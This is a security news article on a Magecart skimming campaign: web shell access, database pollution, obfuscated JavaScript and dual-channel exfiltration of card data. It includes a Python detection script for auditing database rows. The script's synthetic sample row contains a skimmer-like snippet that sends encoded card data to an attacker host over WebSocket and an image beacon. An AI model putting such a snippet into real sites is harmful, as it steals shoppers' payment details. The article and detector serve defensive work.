
Magecart Targets Shoppers with New JavaScript-Based Credit Card Theft Attack


A new variant of the notorious Magecart web skimming attacks has been detected targeting e-commerce platforms, leveraging highly obfuscated JavaScript to invisibly harvest shoppers’ credit card details at checkout.

The attack, analyzed by an incident response team, demonstrates advanced techniques for site compromise, code persistence, and data exfiltration, highlighting growing risks for online retailers and their customers.

Persistent access

Analysis of Attack Lifecycle

The breach typically begins with the theft of backend credentials, often acquired through infostealer malware deployed on administrators’ devices.

These credentials grant attackers privileged access to a website’s management interface.

Once inside, adversaries upload a customized PHP web shell, affording persistent command-and-control (C2) over the server.

This shell is modeled on the open-source P.A.S. Fork v1.4, enabling granular interaction with the web server’s file system and databases.

Persistence is further achieved through “database pollution”: attackers manipulate database rows to inject hidden JavaScript payloads.

Database pollution

Whenever the compromised database entries are accessed, this malicious script executes, facilitating ongoing access and dynamic control over the website.

The malicious JavaScript embedded via database pollution employs advanced obfuscation techniques.

Variables and functions are systematically renamed using hexadecimal notation, and the code’s logic flow is rendered opaque through Immediately Invoked Function Expressions (IIFEs) and recursive function redefinitions.

This deliberate complexity, exemplified by a function dubbed “chameleon”, frustrates conventional code analysis and signature-based detection tools.

The script exploits browser capabilities such as localStorage and dynamically loads further payloads or modifies site content depending on real-time execution context.

According to the report, this adaptive behavior ensures the skimmer remains effective and stealthy even as the website evolves.

Dual-Channel Exfiltration: WebSocket and Image Objects

A notable innovation in this campaign is the use of both WebSocket and image-based channels for real-time exfiltration of sensitive data.

When a user enters payment details, the script aggregates information (including card number, CVV, expiration, address, and email) into a JavaScript object.

For WebSocket exfiltration, the script establishes an encrypted “wss://” connection to the attacker’s C2 server, whose URL is itself stored obfuscated in localStorage.

Data is serialized and transmitted using protocol messages that mimic legitimate application behavior.

For secondary exfiltration, the “createImage” function generates a new image object, crafting its src attribute to encode the stolen data (base64-encoded) as URL parameters.

This technique relies on browsers fetching an image’s src automatically as an ordinary GET request, so the exfiltration blends into normal page traffic and can slip past HTTP monitoring systems.

The destination URL, similarly obfuscated and stored in the browser’s localStorage, points to attacker infrastructure and includes page context, further aiding in evasion.
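A defender-side audit of the “database pollution” and exfiltration indicators described above (hex-renamed identifiers, IIFE wrappers, localStorage lookups, wss:// sockets, image beacons), as an added example that is not from the report or the skimmer itself: the regexes, weights and threshold are assumptions, and the sample rows are constructed.

```python
import re

# Heuristic audit of CMS database rows for injected skimmer JavaScript.
# Indicator patterns follow the campaign described above; weights and the
# alert threshold are assumptions, not values from the report.
INDICATORS = {
    "hex_identifiers": (re.compile(r"\b_0x[0-9a-f]{4,}\b", re.I), 2),
    "iife": (re.compile(r"\(\s*function\s*\([^)]*\)\s*\{[\s\S]*?\}\s*\)\s*\("), 1),
    "local_storage": (re.compile(r"\blocalStorage\.(getItem|setItem)\b"), 1),
    "websocket": (re.compile(r"new\s+WebSocket\s*\(|wss://", re.I), 3),
    "image_beacon": (re.compile(r"new\s+Image\s*\(|\.src\s*=\s*[^;]*\?", re.I), 2),
    "base64_encode": (re.compile(r"\bbtoa\s*\("), 1),
}
SCRIPT_TAG = re.compile(r"<script\b[^>]*>([\s\S]*?)</script>", re.I)

def score_html(fragment):
    """Return (score, matched indicator names) for inline scripts in a fragment."""
    hits, score = set(), 0
    for script in SCRIPT_TAG.findall(fragment):
        for name, (pattern, weight) in INDICATORS.items():
            if name not in hits and pattern.search(script):
                hits.add(name)
                score += weight
    return score, sorted(hits)

def audit_rows(rows, threshold=4):
    """rows: iterable of (table, row_id, column, value); returns rows at or above threshold."""
    findings = []
    for table, row_id, column, value in rows:
        score, hits = score_html(value or "")
        if score >= threshold:
            findings.append({"table": table, "id": row_id, "column": column,
                             "score": score, "indicators": hits})
    return findings

# Constructed sample rows (synthetic, not real skimmer code): one benign
# content block and one polluted row carrying a skimmer-like script.
SAMPLE_ROWS = [
    ("cms_block", 7, "content",
     "<p>Free shipping over $50</p><script>ga('send','pageview');</script>"),
    ("core_config_data", 312, "value",
     "<script>(function(){var _0x3af1=localStorage.getItem('k');"
     "var s=new WebSocket('wss://'+_0x3af1);var i=new Image();"
     "i.src='https://'+_0x3af1+'/p.gif?d='+btoa(JSON.stringify(c));})();</script>"),
]

if __name__ == "__main__":
    for finding in audit_rows(SAMPLE_ROWS):
        print(finding)
```

In practice the rows would be pulled from the platform’s content and configuration tables, and any hit should be diffed against a known-good export before being treated as an infection.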

The complexity and sophistication of this Magecart variant make it a significant threat for e-commerce operators.

Incident response experts urge robust defense-in-depth measures, including enforcing strong, unique administrator credentials, mandatory two-factor authentication, and regular patch management.

Periodic audits of web code and backend databases are critical to detecting unauthorized modifications.

Augmenting traditional defenses with extended detection and response (XDR) technologies and properly configured web application firewalls (WAFs) can further reduce exposure.

Proactive vulnerability assessment and penetration testing are also recommended to uncover and remediate systemic weaknesses before they can be exploited.

With attackers increasingly adopting advanced, adaptive code to bypass detection, e-commerce businesses must stay vigilant to defend both their reputations and their customers’ financial safety.
